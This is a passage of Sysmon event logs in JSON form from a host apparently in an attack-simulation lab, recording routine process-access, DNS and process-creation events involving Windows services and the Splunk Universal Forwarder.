05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001095160500}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001095160500}","TargetProcessId":"2272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.001\r\nSourceProcessGUID: {A837DB8D-0242-5F25-0000-001099C90500}\r\nSourceProcessId: 2272\r\nSourceThreadId: 3020\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.001","SourceProcessGUID":"{A837DB8D-0242-5F25-0000-001099C90500}","SourceProcessId":"2272","SourceThreadId":"3020","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3808,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.352\r\nProcessGuid: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nProcessId: 3916\r\nQueryName: win-dc-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.352","ProcessGuid":"{A837DB8D-0240-5F25-0000-00107DA50500}","QueryName":"win-dc-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.534\r\nProcessGuid: {A837DB8D-0243-5F25-0000-0010A1CB0500}\r\nProcessId: 756\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.534","ProcessGuid":"{A837DB8D-0243-5F25-0000-0010A1CB0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0243-5F25-0000-0010A1CB0500}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0243-5F25-0000-0010A1CB0500}","TargetProcessId":"756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0243-5F25-0000-0010A1CB0500}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0243-5F25-0000-0010A1CB0500}","TargetProcessId":"756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
